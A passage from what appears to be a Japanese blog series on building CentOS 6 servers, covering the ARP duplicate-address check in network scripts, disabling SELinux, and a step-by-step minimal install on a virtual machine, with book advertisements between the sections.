      if ! /sbin/arping -q -c 2 -w 3 -D -I ${REALDEVICE} ${ipaddr[$idx]} ; then
            net_log $"Error, some other host already uses address ${ipaddr[$idx]}."
            exit 1
      fi

そのため、IPを変えたりせずに再起動を行なうと、arpキャッシュ自体はあるので、
すでに使用済みですよ!というメッセージが表示される事になる。
NIC設定ファイルにarpチェックを行なわないよう、下記記述を追加する事もできます
ARPCHECK=no

SELinuxの無効化


私もSELinux無効化派です。
余計な管理やミドルウェアの動きを妨げる可能性があるので、無効化しましょう。
# vim /etc/selinux/config
SELINUX=disabled

設定を反映させるため、一回サーバを再起動しましょう。

再起動後設定が反映されているか確認しましょう。
# getenforce
Disabled
# modprobe -c |grep ipv6
options ipv6 disable=1
---
よっしゃー!次は標準パッケージを少しカスタマイズしていきましょう。



プロのための Linuxシステム構築・運用技術 (Software Design plus)
中井 悦司
技術評論社
売り上げランキング: 101,118

Linuxサーバを作る


7系が出て、色々変わって騒がれていますが、
もう少し安定バージョンX.3~くらいになるまではまだまだ6系がメインでしょ!と思い。

Redhat/CentOSの6系OSの設定作業について、簡単に一回纏めとこうと思います。
今回設定するのは当然、フリーのCentOSです。

CentOSのインストール

インストールメディアの準備


まずインストールメディアを入手しましょう。
そもそもクラウドメインの最近ではインストール自体、やらない作業になってきていますね。

CentOSのメディアは下記サイトからダウンロード可能です。
http://www.centos.org/download/

昔に比べて分かりにくくなった気がしますが、ミラーリストの近くて早いサイトから落とします。
参考までに、日本だと"riken"が安定しているかもしれません。
ここからインストールメディアを作成するためのISOファイルを入手し、インストールします。
私はあまり余計なパッケージを最初から入れたくないので、
必要最低限がパッケージされている"minimal"を入手します。

OSのインストール


今回はVM仮想にインストールするので、ISOファイルそのままインストールを行いましょう。
VM環境の準備は今回は割愛。
ISOからブートするとインストールウィザードが始まります。
※GUIでのインストールを行うにはサーバのメモリが652MB以上でないとコマンドインストールになります。
インストール言語を選択。
キーボード言語を選択。
インストールするサーバのストレージタイプを選択。
SANとかではなく、サーバローカルにインストールするのでそのまま。
インストールディスク内容の確認。
今回は初めてのインストールでハードディスク上にデータは無いため無視してインストール。
既存サーバの空きパーティションにインストールする場合なんかは「いいえ」を選択。
ホスト名(サーバ名)の入力。後で変更可能です。


次にネットワークの設定。後で変更可能。
インストール後に設定でも大丈夫です。
サーバ時刻の設定。後で変更可能。
管理者ユーザー(root)アカウントのパスワード設定。後で変更可能。
管理者ユーザーの権限は絶大です。公開するサーバであればきちんとセキュリティの高いパスワードを設定しましょう。
インストールパーティションの選択。
インストールサーバのパーティションと相談し決めましょう。
特にキメが無いのであれば、LVMを利用したフル領域のインストールでいいと思います。
※「システムを暗号化する」にチェックを入れた場合、起動時に認証処理が走り成功しないと起動しません。
  サービス用サーバとして使う場合、自動起動してこないので注意が必要です。
※インストールディスクのサイズが50GB以上で、「全ての領域を使用する」を選択した場合、
  勝手にLVMパーティションが区切られてます。
  ある程度のディスクサイズ以上のサーバにインストールする場合、チェックを入れて必ず確認しましょう。

好みでカスタマイズするのもアリです。
私はboot領域に500MBもいらないと思うので、少し調整したりします。
パーティションの推奨値についてはredhatのインストールガイドを参考にしています。
ここで問題なければ「次へ」を押した後、ディスクのフォーマットが始まり、パーティションが構成されます。
ここで間違いがあった場合、再インストールになりかねないのできちんと確認します。
ここまでくればほぼ終了。
後ははいはいでインストールは進みます。
ちなみに、フルパッケージのインストールメディアでインストールを行っていた場合、
このインストール画面の前に、どのパッケージを入れるか選択画面があります。
今回はminimalパッケージと最初からしているので割愛。
これでインストール完了です。お疲れ様でした。
最後に再起動しましょう。

次はサーバとして活躍できるよう、OSの設定を行います。


できるPRO CentOS 6 サーバー (できるプロシリーズ)
辻 秀典 渡辺 高志 できるシリーズ編集部
インプレスジャパン
売り上げランキング: 86,051